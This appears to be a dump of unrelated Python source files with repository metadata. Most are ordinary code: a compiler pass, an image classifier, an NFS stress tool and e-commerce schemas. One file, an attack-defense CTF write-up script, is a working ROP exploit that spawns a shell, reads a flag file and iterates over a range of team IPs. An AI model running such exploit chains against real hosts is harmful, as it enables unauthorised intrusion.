""" The second pass block compiler.
This is a base class for the second pass compilers for the enamldef
and template block definitions.
"""
| 33.164021 | 79 | 0.628271 | #------------------------------------------------------------------------------
# Copyright (c) 2013-2017, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
#------------------------------------------------------------------------------
from atom.api import Typed
from . import compiler_common as cmn
class BaseBlockCompiler(cmn.CompilerBase):
""" The base class of the block compilers.
"""
#: The set of local names for the compiler.
local_names = Typed(set, ())
#: A mapping of ast node -> compiler node index for the block.
index_map = Typed(dict, ())
def parent_index(self):
""" Get the node index for the parent node.
Returns
-------
result : int
The compiler node index for the node represented by the
current parent ast node.
"""
return self.index_map[self.ancestor()]
class FirstPassBlockCompiler(BaseBlockCompiler):
""" The first pass block compiler.
This is a base class for the first pass compilers for the enamldef
and template block definitions.
"""
#: A mapping of auxiliary ast node -> compiler node index.
aux_index_map = Typed(dict, ())
def visit_ChildDef(self, node):
# Claim the index for the compiler node.
index = len(self.index_map)
self.index_map[node] = index
# Setup the line number for the child def.
cg = self.code_generator
cg.set_lineno(node.lineno)
# Generate the child def compiler node.
cmn.gen_child_def_node(cg, node, self.local_names)
# Store the compiler node in the node list.
cmn.store_node(cg, index)
# Append the compiler node to the parent node.
cmn.append_node(cg, self.parent_index(), index)
# Visit the body of the child def.
for item in node.body:
self.visit(item)
def visit_TemplateInst(self, node):
# No pragmas are supported yet for template inst nodes.
cmn.warn_pragmas(node, self.filename)
# Claim the index for the compiler node.
index = len(self.index_map)
self.index_map[node] = index
# Setup the line number for the template inst.
cg = self.code_generator
cg.set_lineno(node.lineno)
# Generate the template inst compiler node.
cmn.gen_template_inst_node(cg, node, self.local_names)
# Store the compiler node in the node list.
cmn.store_node(cg, index)
# Append the compiler node to the parent node.
cmn.append_node(cg, self.parent_index(), index)
# Visit the body of the template inst.
for item in node.body:
self.visit(item)
def visit_TemplateInstBinding(self, node):
# Grab the index of the parent node for later use.
self.aux_index_map[node] = self.parent_index()
def visit_Binding(self, node):
# Grab the index of the parent node for later use.
self.aux_index_map[node] = self.parent_index()
def visit_ExBinding(self, node):
# Grab the index of the parent node for later use.
self.aux_index_map[node] = self.parent_index()
def visit_AliasExpr(self, node):
# Grab the index of the parent node for later use.
self.aux_index_map[node] = self.parent_index()
def visit_StorageExpr(self, node):
# Grab the index of the parent node for later use.
self.aux_index_map[node] = self.parent_index()
def visit_FuncDef(self, node):
# Grab the index of the parent node for later use.
self.aux_index_map[node] = self.parent_index()
def visit_AsyncFuncDef(self, node):
# Grab the index of the parent node for later use.
self.aux_index_map[node] = self.parent_index()
class SecondPassBlockCompiler(BaseBlockCompiler):
""" The second pass block compiler.
This is a base class for the second pass compilers for the enamldef
and template block definitions.
"""
def visit_ChildDef(self, node):
# Visit the body of the child def.
for item in node.body:
self.visit(item)
def visit_TemplateInst(self, node):
if node.body:
# Create the unpack map.
cg = self.code_generator
index = self.index_map[node]
cmn.load_helper(cg, 'make_unpack_map')
cmn.load_node(cg, index)
cg.call_function(1)
cg.store_fast(cmn.UNPACK_MAP)
# Visit the body of the template inst.
for item in node.body:
self.visit(item)
def visit_TemplateInstBinding(self, node):
# Generate the code for the template inst binding.
cg = self.code_generator
index = self.parent_index()
cmn.gen_template_inst_binding(cg, node, index)
def visit_Binding(self, node):
# Generate the code for the operator binding.
cg = self.code_generator
index = self.parent_index()
cmn.gen_operator_binding(cg, node.expr, index, node.name)
def visit_ExBinding(self, node):
# Generate the code for the operator binding.
cg = self.code_generator
index = self.parent_index()
cmn.gen_operator_binding(cg, node.expr, index, node.chain)
def visit_AliasExpr(self, node):
# Generate the code for the alias expression.
cg = self.code_generator
index = self.parent_index()
cmn.gen_alias_expr(cg, node, index)
def visit_StorageExpr(self, node):
# Generate the code for the storage expression.
cg = self.code_generator
index = self.parent_index()
cmn.gen_storage_expr(cg, node, index, self.local_names)
if node.expr is not None:
cmn.gen_operator_binding(cg, node.expr, index, node.name)
def visit_FuncDef(self, node):
# Generate the code for the function declaration.
cg = self.code_generator
index = self.parent_index()
cmn.gen_decl_funcdef(cg, node, index)
def visit_AsyncFuncDef(self, node):
# Generate the code for the async function declaration.
self.visit_FuncDef(node)
| 4,269 | 0 | 485 |
e7bda1f0e2ab84fc86e9229ca20b8b5215ecebd9 | 46 | py | Python | deidentify/tokenizer/__init__.py | bbieniek/deidentify | 7021bf0540e0a7f931e65544d12a2909c79a14eb | [
"MIT"
] | 64 | 2020-01-16T16:20:47.000Z | 2022-03-31T12:59:19.000Z | deidentify/tokenizer/__init__.py | HabibMrad/deidentify | d8960a74c852a71b29a6ee0fd6a3cf7f946a5f60 | [
"MIT"
] | 14 | 2020-01-28T08:47:06.000Z | 2022-02-12T08:32:12.000Z | deidentify/tokenizer/__init__.py | HabibMrad/deidentify | d8960a74c852a71b29a6ee0fd6a3cf7f946a5f60 | [
"MIT"
] | 12 | 2020-01-21T07:54:04.000Z | 2022-02-19T06:42:53.000Z | from .base import Tokenizer, TokenizerFactory
| 23 | 45 | 0.847826 | from .base import Tokenizer, TokenizerFactory
| 0 | 0 | 0 |
1371183d26f36f81df8c25639f4523c744c2c32b | 1,682 | py | Python | pwn/writeup.py | GinkgoTeam/2019YJTZB | 7acb23f145ff70e09baade92e6b5a65856b36a1e | [
"MIT"
] | 41 | 2019-05-13T14:22:58.000Z | 2021-11-12T03:30:10.000Z | pwn/writeup.py | GinkgoTeam/2019YJTZB | 7acb23f145ff70e09baade92e6b5a65856b36a1e | [
"MIT"
] | null | null | null | pwn/writeup.py | GinkgoTeam/2019YJTZB | 7acb23f145ff70e09baade92e6b5a65856b36a1e | [
"MIT"
] | 10 | 2019-05-13T22:49:22.000Z | 2021-02-16T20:33:32.000Z | from pwn import *
import requests
import time
import re
for i in range(101,125):
try:
ip='172.20.{}.101'.format(str(i))
flag=main(ip)
print ip,flag
time.sleep(11)
except:
print 'wrong' | 18.086022 | 41 | 0.631391 | from pwn import *
import requests
import time
import re
def main(ip):
p=remote(ip,10000)
elf=ELF('./calculator')
system_addr=elf.symbols['system']
binsh_addr=0x006020A0
poprdi=0x00400ec3
poprsi=0x400ec1
frmst_addr=0x400FD2
scanf_plt=elf.symbols['__isoc99_scanf']
#context.log_level='debug'
def fillchar(payload):
p.recvuntil('operation:\n\n')
p.sendline('1')
p.recvuntil('x:\n')
p.sendline(str(payload))
p.recvuntil('y:\n')
p.sendline('0')
def sendpayload(payload):
p.recvuntil('operation:\n\n')
p.sendline('1')
p.recvuntil('x:\n')
p.sendline(str(payload))
p.recvuntil('y:\n')
p.sendline('0')
p.recvuntil('operation:\n\n')
p.sendline('1')
p.recvuntil('x:\n')
p.sendline('0')
p.recvuntil('y:\n')
p.sendline('0')
def savepayload():
p.recvuntil('operation:\n\n')
p.sendline('5')
def exp():
p.recvuntil('calculations:')
p.sendline(str(100))
for i in range(62):
fillchar(0)
#sendpayload(0x400a1f)
#gdb.attach(p)
exp()
sendpayload(poprdi)
sendpayload(frmst_addr)
sendpayload(poprsi)
sendpayload(binsh_addr)
sendpayload(0)
#0.&a.shu
sendpayload(scanf_plt)
sendpayload(poprdi)
sendpayload(binsh_addr)
sendpayload(system_addr)
savepayload()
binsh='sh'+'\x00'
print len(binsh)
binsh=binsh.ljust(8,'\x00')
print len(binsh)
dudu=u64(binsh)
p.send(str(dudu))
p.sendline('\n')
p.sendline('cat /flag.txt')
flag=p.recv()
return flag
p.close()
for i in range(101,125):
try:
ip='172.20.{}.101'.format(str(i))
flag=main(ip)
print ip,flag
time.sleep(11)
except:
print 'wrong' | 1,443 | 0 | 25 |
9b6af6ffc3ebeeecd335510475daec57d7b18297 | 3,615 | py | Python | dogs-vs-cats-tf-cnn.py | sandeshrjain/DNN_helper | 1d03c794c1b54193f4a6fca177f34600c5a9c4e0 | [
"MIT"
] | null | null | null | dogs-vs-cats-tf-cnn.py | sandeshrjain/DNN_helper | 1d03c794c1b54193f4a6fca177f34600c5a9c4e0 | [
"MIT"
] | null | null | null | dogs-vs-cats-tf-cnn.py | sandeshrjain/DNN_helper | 1d03c794c1b54193f4a6fca177f34600c5a9c4e0 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 7 15:08:04 2022
@author: Sandesh Jain
"""
import tensorflow as tf
import numpy as np
import os
from tensorflow.keras.models import Model
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.layers import (Conv2D, Dense, Flatten, Input,
Lambda, MaxPooling2D, Dropout)
train_gen = ImageDataGenerator(rescale =1./255,
shear_range =0.2,
zoom_range = 0.2,
horizontal_flip =True)
test_gen = ImageDataGenerator(rescale = 1./255)
train_set = train_gen.flow_from_directory('C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/train',
target_size=(64,64),
batch_size= 32,
class_mode='binary')
test_set = test_gen.flow_from_directory('C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/test',
target_size=(64,64),
batch_size= 32,
class_mode='binary')
dc_model = build_cat_dog_model()
dc_model.fit_generator(train_set,
epochs = 30,
validation_data =test_set)
| 30.378151 | 133 | 0.526141 | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 7 15:08:04 2022
@author: Sandesh Jain
"""
import tensorflow as tf
import numpy as np
import os
from tensorflow.keras.models import Model
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.layers import (Conv2D, Dense, Flatten, Input,
Lambda, MaxPooling2D, Dropout)
def make_data():
path, dirs, files = next(os.walk("C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/train/train"))
#file_count = len(files)
for file in files:
if file[0] == 'c':
os.rename("C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/train/train/" + file,
"C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/train/cat/" + file)
else:
os.rename("C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/train/train/" + file,
"C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/train/dog/" + file)
for label in ['dog', 'cat']:
path, dirs, files = next(os.walk("C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/train/" + label))
#file_count = len(files)
for idx, file in enumerate(files):
if idx >= 10000:
os.rename(path + '/' + file,
"C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/test/" + label + '/' + file)
train_gen = ImageDataGenerator(rescale =1./255,
shear_range =0.2,
zoom_range = 0.2,
horizontal_flip =True)
test_gen = ImageDataGenerator(rescale = 1./255)
train_set = train_gen.flow_from_directory('C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/train',
target_size=(64,64),
batch_size= 32,
class_mode='binary')
test_set = test_gen.flow_from_directory('C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/test',
target_size=(64,64),
batch_size= 32,
class_mode='binary')
def build_cat_dog_model():
input_img = Input((64,64,3))
x = Conv2D(32, (5, 5), strides=(1,1), padding = 'valid', activation='relu')(input_img)
x = Conv2D(32, (5, 5), strides=(1,1), padding = 'valid', activation='relu')(x)
x = MaxPooling2D()(x)
x = Conv2D(64, (3,3), strides=(1,1), padding = 'valid', activation='relu')(x)
x = Conv2D(64, (3,3), strides=(1,1), padding = 'valid', activation='relu')(x)
x = MaxPooling2D()(x)
x = Flatten()(x)
x = Dense(64, activation='relu')(x)
x = Dropout(0.2)(x)
x = Dense(1, activation='sigmoid')(x)
model = Model(input_img, x)
model.compile(optimizer= 'adam', loss='binary_crossentropy', metrics=['accuracy'])
return model
dc_model = build_cat_dog_model()
dc_model.fit_generator(train_set,
epochs = 30,
validation_data =test_set)
| 1,888 | 0 | 51 |
836d5f3396fbb107c7f1329399d9eb4e57f2fdd0 | 5,575 | py | Python | io_tools/msrsync_sim.py | samuelsh/MultiFileOps | bc998fee6b02120a7783527767c93d5bf2ebfacd | [
"MIT"
] | 5 | 2019-06-05T11:22:25.000Z | 2020-07-13T10:37:01.000Z | io_tools/msrsync_sim.py | samuelsh/MultiFileOps | bc998fee6b02120a7783527767c93d5bf2ebfacd | [
"MIT"
] | 1 | 2021-01-05T11:18:27.000Z | 2021-01-05T11:18:27.000Z | io_tools/msrsync_sim.py | samuelsh/pyfs_stress | bc998fee6b02120a7783527767c93d5bf2ebfacd | [
"MIT"
] | null | null | null | #!/usr/bin/env python3.6
"""
author: samuels
"""
import argparse
import hashlib
import os
import queue
import sys
import random
import threading
sys.path.append(os.path.join(os.path.join('../')))
from concurrent.futures import ThreadPoolExecutor
from threading import Event
from client.generic_mounter import Mounter
from logger.server_logger import ConsoleLogger
from utils.shell_utils import StringUtils
logger = None
stop_event = None
files_counter = 0
dir_counter = 0
KB1 = 1024
MB1 = KB1 * 1024
DATA_BUF = os.urandom(KB1 * 8)
data_array = []
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
logger.info("Test stopped by user. See ya!")
stop_event.set()
except Exception as generic_error:
logger.exception(generic_error)
sys.exit(1)
| 33.787879 | 120 | 0.650583 | #!/usr/bin/env python3.6
"""
author: samuels
"""
import argparse
import hashlib
import os
import queue
import sys
import random
import threading
sys.path.append(os.path.join(os.path.join('../')))
from concurrent.futures import ThreadPoolExecutor
from threading import Event
from client.generic_mounter import Mounter
from logger.server_logger import ConsoleLogger
from utils.shell_utils import StringUtils
logger = None
stop_event = None
files_counter = 0
dir_counter = 0
KB1 = 1024
MB1 = KB1 * 1024
DATA_BUF = os.urandom(KB1 * 8)
data_array = []
class StatsCollector(threading.Timer):
def __init__(self, func, interval=60):
super().__init__(interval, func)
def run(self):
while not self.finished.is_set():
self.finished.wait(self.interval)
self.function(*self.args, **self.kwargs)
def print_stats_worker():
global logger, dir_counter, files_counter
logger.info("#### Stats >>> Created Directories: {} Created Files: {}".format(dir_counter, files_counter))
def init_data_array():
global data_array
for _ in range(100000):
buf = os.urandom(KB1 * 4)
buf = buf[0:random.randint(KB1 * 4 - 1, KB1 * 4)]
checksum = hashlib.md5(buf).hexdigest()
data_array.append({'filename': f"{checksum}_{len(buf)}", 'data': buf})
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--cluster", help="Cluster Name", required=True, type=str)
parser.add_argument("-e", "--export", help="NFS Export", default="/", type=str)
parser.add_argument("-d", "--test_dir", help="Directory under test", default="", type=str)
parser.add_argument("-f", "--files_num", help="Total to to create per directory", default=10000, type=int)
parser.add_argument("-t", "--threads", help="Number of files producer threads", default=16, type=int)
parser.add_argument("--duration", type=int, help="Test duration (in minutes)", default=10)
parser.add_argument('--start_vip', type=str, help="Start VIP address range")
parser.add_argument('--end_vip', type=str, help="End VIP address range")
return parser.parse_args()
def futures_validator(futures, raise_on_error=True):
global logger
for future in futures:
try:
future.result()
except Exception as e:
logger.error("ThreadPool raised exception: {}. Exiting with error.".format(e))
raise e
def files_producer_worker(mp, test_dir, repeats=10000):
global stop_event, logger, data_array
try:
for _ in range(repeats):
if stop_event.is_set():
break
file_entry = random.choice(data_array)
file_path = os.path.join(mp, test_dir, file_entry['filename'])
try:
with open(file_path, "wb") as f:
f.write(file_entry['data'])
except FileExistsError:
pass
except (IOError, OSError) as err:
logger.error(f"Files produces worker {threading.get_ident()} raised stop event due to error {err}")
stop_event.set()
raise err
except queue.Empty:
pass
def main():
global logger, stop_event
logger = ConsoleLogger('msrsync_sim').logger
stats_collector = StatsCollector(print_stats_worker)
stop_event = Event()
args = get_args()
test_dir = args.test_dir
files_num = args.files_num
logger.info("Initialising DataSet ...")
init_data_array()
logger.info("Mounting work path...")
mounter = Mounter(args.cluster, args.export, 'nfs3', 'MSRSYNC_SIM', logger=logger, nodes=0,
domains=0, sudo=True, start_vip=args.start_vip, end_vip=args.end_vip)
try:
mounter.mount_all_vips()
except AttributeError:
logger.warn("VIP range is bad or None. Falling back to single mount")
mounter.mount()
mount_point = mounter.get_random_mountpoint()
try:
os.mkdir(os.path.join(mount_point, test_dir))
except FileExistsError as e:
logger.warn(f"{e}")
logger.info(f"Test directory {test_dir} created on {mount_point}")
futures = []
logger.info(f"Going to produce {files_num * 100} files")
with ThreadPoolExecutor() as executor:
for _ in range(100):
futures.append(executor.submit(files_producer_worker, mounter.get_random_mountpoint(), test_dir, files_num))
futures_validator(futures, True)
logger.info("Done writing dataset, verifying...")
scandir_iterator = os.scandir(os.path.join(mount_point, test_dir))
for file_entry in scandir_iterator:
file_name = file_entry.name
stored_checksum, stored_length = file_name.split('_')
if int(stored_length) != os.stat(file_entry.path).st_size:
raise RuntimeError(f"File {file_entry.path} length mismatch!"
f" {int(stored_length)} != {os.stat(file_entry.path).st_size}")
with open(file_entry.path, 'rb') as f:
buf = f.read()
checksum = hashlib.md5(buf).hexdigest()
if stored_checksum != checksum:
raise RuntimeError(f"File {file_entry.path} checksum mismatch!"
f" {stored_checksum} != {checksum}")
logger.info("### Workload is Done. Come back tomorrow.")
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
logger.info("Test stopped by user. See ya!")
stop_event.set()
except Exception as generic_error:
logger.exception(generic_error)
sys.exit(1)
| 4,523 | 17 | 214 |
61a8114a54c19e8c1a637205d2457235593b05db | 916 | py | Python | test/python_comparison.py | fmaguire/metagenome_simulator | 79fc18ab21a897d2d16cca45e40e934acbf315d6 | [
"MIT"
] | null | null | null | test/python_comparison.py | fmaguire/metagenome_simulator | 79fc18ab21a897d2d16cca45e40e934acbf315d6 | [
"MIT"
] | null | null | null | test/python_comparison.py | fmaguire/metagenome_simulator | 79fc18ab21a897d2d16cca45e40e934acbf315d6 | [
"MIT"
] | null | null | null |
if __name__=="__main__":
name_to_aro = {'mel': "3000616", 'pmrA':"3000822" , 'patB': "3000025"}
strict_perfect = {'500': "strict", '1000': "perfect"}
expected_bedtool_labels = open('bedtools_labels.tsv', 'w')
labels = {}
with open('intersection.tsv') as fh:
for line in fh:
line = line.strip().split('\t')
labels.update({line[3]: [line[3], line[0], name_to_aro[line[-4]],
line[-4], strict_perfect[line[-3]], line[-1]]})
with open('output.fq') as fh:
for line_num, line in enumerate(fh):
if line_num % 4 == 0:
line = line.strip()
line = line.replace("@", '')
if line in labels:
expected_bedtool_labels.write("\t".join(labels[line])+"\n")
else:
expected_bedtool_labels.write("\t".join(["na"]*6)+"\n")
| 31.586207 | 79 | 0.505459 |
if __name__=="__main__":
name_to_aro = {'mel': "3000616", 'pmrA':"3000822" , 'patB': "3000025"}
strict_perfect = {'500': "strict", '1000': "perfect"}
expected_bedtool_labels = open('bedtools_labels.tsv', 'w')
labels = {}
with open('intersection.tsv') as fh:
for line in fh:
line = line.strip().split('\t')
labels.update({line[3]: [line[3], line[0], name_to_aro[line[-4]],
line[-4], strict_perfect[line[-3]], line[-1]]})
with open('output.fq') as fh:
for line_num, line in enumerate(fh):
if line_num % 4 == 0:
line = line.strip()
line = line.replace("@", '')
if line in labels:
expected_bedtool_labels.write("\t".join(labels[line])+"\n")
else:
expected_bedtool_labels.write("\t".join(["na"]*6)+"\n")
| 0 | 0 | 0 |
a6cea3059e191fe8d12739e5c5b75a0fafb9d802 | 1,822 | py | Python | src/commercetools/importapi/models/_schemas/inventories.py | labd/commercetools-python-sdk | d8ec285f08d56ede2e4cad45c74833f5b609ab5c | [
"MIT"
] | 15 | 2018-11-02T14:35:52.000Z | 2022-03-16T07:51:44.000Z | src/commercetools/importapi/models/_schemas/inventories.py | labd/commercetools-python-sdk | d8ec285f08d56ede2e4cad45c74833f5b609ab5c | [
"MIT"
] | 84 | 2018-11-02T12:50:32.000Z | 2022-03-22T01:25:54.000Z | src/commercetools/importapi/models/_schemas/inventories.py | labd/commercetools-python-sdk | d8ec285f08d56ede2e4cad45c74833f5b609ab5c | [
"MIT"
] | 13 | 2019-01-03T09:16:50.000Z | 2022-02-15T18:37:19.000Z | # This file is automatically generated by the rmf-codegen project.
#
# The Python code generator is maintained by Lab Digital. If you want to
# contribute to this project then please do not edit this file directly
# but send a pull request to the Lab Digital fork of rmf-codegen at
# https://github.com/labd/rmf-codegen
import re
import typing
import marshmallow
import marshmallow_enum
from commercetools import helpers
from ... import models
from .common import ImportResourceSchema
# Fields
# Marshmallow Schemas
| 29.387097 | 77 | 0.698683 | # This file is automatically generated by the rmf-codegen project.
#
# The Python code generator is maintained by Lab Digital. If you want to
# contribute to this project then please do not edit this file directly
# but send a pull request to the Lab Digital fork of rmf-codegen at
# https://github.com/labd/rmf-codegen
import re
import typing
import marshmallow
import marshmallow_enum
from commercetools import helpers
from ... import models
from .common import ImportResourceSchema
# Fields
# Marshmallow Schemas
class InventoryImportSchema(ImportResourceSchema):
sku = marshmallow.fields.String(allow_none=True, missing=None)
quantity_on_stock = marshmallow.fields.Float(
allow_none=True, missing=None, data_key="quantityOnStock"
)
restockable_in_days = marshmallow.fields.Float(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="restockableInDays",
)
expected_delivery = marshmallow.fields.DateTime(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="expectedDelivery",
)
supply_channel = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.ChannelKeyReferenceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="supplyChannel",
)
custom = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".customfields.CustomSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.InventoryImport(**data)
| 62 | 1,216 | 22 |
a14f792aeed702ea0d392d0cee6f0f3d00bd091c | 1,909 | py | Python | unimodal/vision/dataset.py | shubham-gupta-iitr/mmmlX | 3485e6191e0e45bf1c8168e4e928a36ab9264d22 | [
"Apache-2.0"
] | null | null | null | unimodal/vision/dataset.py | shubham-gupta-iitr/mmmlX | 3485e6191e0e45bf1c8168e4e928a36ab9264d22 | [
"Apache-2.0"
] | null | null | null | unimodal/vision/dataset.py | shubham-gupta-iitr/mmmlX | 3485e6191e0e45bf1c8168e4e928a36ab9264d22 | [
"Apache-2.0"
] | 1 | 2022-02-12T23:38:10.000Z | 2022-02-12T23:38:10.000Z | import numpy as np
from torch.utils.data import Dataset
import cv2
from torchvision import transforms
import base64
from PIL import Image
np.random.seed(0)
| 34.709091 | 107 | 0.590885 | import numpy as np
from torch.utils.data import Dataset
import cv2
from torchvision import transforms
import base64
from PIL import Image
np.random.seed(0)
class ImageDataset(Dataset):
def __init__(self, cfg, ids, dataset):
self.cfg = cfg
self._ids = ids
self._num_ids = len(ids)
self._image_paths = []
self.lineidx_path = cfg.lineidx_path
self.image_tsv = cfg.image_tsv
with open(self.lineidx_path, "r") as fp_lineidx:
self.lineidx = [int(i.strip()) for i in fp_lineidx.readlines()]
image_paths = []
for id in self._ids:
for f in dataset[id]['img_posFacts']:
image_paths.append(f['image_id'])
for f in dataset[id]['img_negFacts']:
image_paths.append(f['image_id'])
self._image_paths = list(set(image_paths))
self._num_images = len(self._image_paths)
def __len__(self):
return self._num_images
def load_img(self, image_id):
with open(self.image_tsv, "r") as fp:
fp.seek(self.lineidx[int(image_id)%10000000])
imgid, img_base64 = fp.readline().strip().split('\t')
image = cv2.imdecode(np.frombuffer(base64.b64decode(img_base64), dtype=np.uint8), cv2.IMREAD_COLOR)
if image is None:
image = np.zeros((512,512,3), dtype=np.uint8)
image = image[:,:,::-1]
image = Image.fromarray(image)
tfs = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
image = tfs(image)
return image
def __getitem__(self, idx):
image_id = self._image_paths[idx]
image = self.load_img(image_id)
return image, image_id
| 1,599 | 7 | 138 |
cea112fa5664fda55582fe64fab2a7e867c249ca | 1,144 | py | Python | Lib/test/test_exceptions_jy.py | clach04/bb_import_jython | 4529a0f578186a1c33c476300294ab42658eaf7c | [
"CNRI-Jython"
] | 49 | 2015-03-10T17:34:19.000Z | 2021-11-10T22:23:18.000Z | Lib/test/test_exceptions_jy.py | clach04/bb_import_jython | 4529a0f578186a1c33c476300294ab42658eaf7c | [
"CNRI-Jython"
] | 1 | 2021-04-11T15:01:12.000Z | 2021-04-11T15:01:12.000Z | Lib/test/test_exceptions_jy.py | clach04/bb_import_jython | 4529a0f578186a1c33c476300294ab42658eaf7c | [
"CNRI-Jython"
] | 32 | 2015-02-06T12:10:32.000Z | 2019-06-18T03:21:36.000Z | """Misc. exception related tests
Made for Jython.
"""
from test import test_support
import unittest
#From bugtests/test076.py
if __name__ == '__main__':
test_main()
| 22.88 | 65 | 0.565559 | """Misc. exception related tests
Made for Jython.
"""
from test import test_support
import unittest
class C:
def __str__(self):
raise Exception("E")
def __repr__(self):
raise Exception("S")
class ExceptionsTestCase(unittest.TestCase):
def test_keyerror_str(self):
self.assertEquals(str(KeyError()), '')
# Is actually repr(args[0])
self.assertEquals(str(KeyError('')), "''")
self.assertEquals(str(KeyError('', '')), "('', '')")
#From bugtests/test076.py
def test_raise_no_arg(self):
r = None
try:
try:
raise RuntimeError("dummy")
except RuntimeError:
raise
except RuntimeError, e:
r = str(e)
self.assertEquals(r, "dummy")
def testBugFix1149372(self):
try:
c = C()
str(c)
except Exception, e:
assert e.args[0] == "E"
return
unittest.fail("if __str__ raises an exception, re-raise")
def test_main():
test_support.run_unittest(ExceptionsTestCase)
if __name__ == '__main__':
test_main()
| 756 | 10 | 201 |
c17d297d3e3b1768409a383f1791dd0e2160d9ed | 97 | py | Python | pythonProject/MUNDO 3/Relembrando listas 2.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | null | null | null | pythonProject/MUNDO 3/Relembrando listas 2.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | 1 | 2021-06-25T15:29:11.000Z | 2021-06-25T15:29:11.000Z | pythonProject/MUNDO 3/Relembrando listas 2.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | null | null | null | import pandas as pd
df = pd.read_excel("Média teste.xlsx", sheet_name= "Média")
print(df.head()) | 24.25 | 59 | 0.721649 | import pandas as pd
df = pd.read_excel("Média teste.xlsx", sheet_name= "Média")
print(df.head()) | 0 | 0 | 0 |
5033e4ea9ff6c8c56046be03a2caffa035f89f26 | 1,117 | py | Python | src/interpreter.py | Vekteur/vprolog | c40afed4d61a7637e63d522b230ed4d187950382 | [
"MIT"
] | 1 | 2021-05-19T11:00:53.000Z | 2021-05-19T11:00:53.000Z | src/interpreter.py | Vekteur/vprolog | c40afed4d61a7637e63d522b230ed4d187950382 | [
"MIT"
] | null | null | null | src/interpreter.py | Vekteur/vprolog | c40afed4d61a7637e63d522b230ed4d187950382 | [
"MIT"
] | null | null | null | from prolog_parser import PrologParser
from inference import Inference
from copy import deepcopy
import sys
import lark | 23.270833 | 83 | 0.703671 | from prolog_parser import PrologParser
from inference import Inference
from copy import deepcopy
import sys
import lark
def read(file):
with open(file) as f:
return f.read()
class Interpreter:
builtin_file = 'data/builtin.pl'
def __init__(self, input_file):
program_parser = PrologParser()
self.request_parser = PrologParser('request')
program = program_parser.parse(read(Interpreter.builtin_file) + read(input_file))
self.inference = Inference(program)
def process_request(self, request):
nb_sols = 0
for sol in self.inference(request.body):
if sol.count_visible() == 0:
print('true.')
else:
print(sol)
nb_sols += 1
if nb_sols == 0:
print('false.')
def start(self):
while True:
prefix = '?- '
try:
str_request = input(prefix)
except KeyboardInterrupt:
break
if not str_request:
break
try:
request = self.request_parser.parse(prefix + str_request)
except lark.exceptions.LarkError:
print('Error : invalid syntax')
continue
try:
self.process_request(request)
except RecursionError:
print('Error : stack overflow') | 848 | 104 | 46 |
83d56b2fdd5a7b665bc10619bbd403eda9df6a10 | 1,479 | py | Python | hknweb/events/views/event_transactions/update_event.py | jyxzhang/hknweb | a01ffd8587859bf63c46213be6a0c8b87164a5c2 | [
"MIT"
] | null | null | null | hknweb/events/views/event_transactions/update_event.py | jyxzhang/hknweb | a01ffd8587859bf63c46213be6a0c8b87164a5c2 | [
"MIT"
] | null | null | null | hknweb/events/views/event_transactions/update_event.py | jyxzhang/hknweb | a01ffd8587859bf63c46213be6a0c8b87164a5c2 | [
"MIT"
] | null | null | null | from django.contrib import messages
from django.views.generic.edit import UpdateView
from hknweb.utils import (
method_login_and_permission,
DATETIME_12_HOUR_FORMAT,
PACIFIC_TIMEZONE,
)
from hknweb.events.models import Event
from hknweb.events.forms import EventUpdateForm
@method_login_and_permission("events.change_event")
| 33.613636 | 85 | 0.673428 | from django.contrib import messages
from django.views.generic.edit import UpdateView
from hknweb.utils import (
method_login_and_permission,
DATETIME_12_HOUR_FORMAT,
PACIFIC_TIMEZONE,
)
from hknweb.events.models import Event
from hknweb.events.forms import EventUpdateForm
@method_login_and_permission("events.change_event")
class EventUpdateView(UpdateView):
model = Event
form_class = EventUpdateForm
template_name_suffix = "_manage"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["title"] = f"Edit Event: {self.object.name}"
return context
def get_initial(self):
"""Override some prepopulated data with custom data; in this case, make times
the right format."""
initial = super().get_initial()
initial["start_time"] = self.object.start_time.astimezone(
PACIFIC_TIMEZONE
).strftime(DATETIME_12_HOUR_FORMAT)
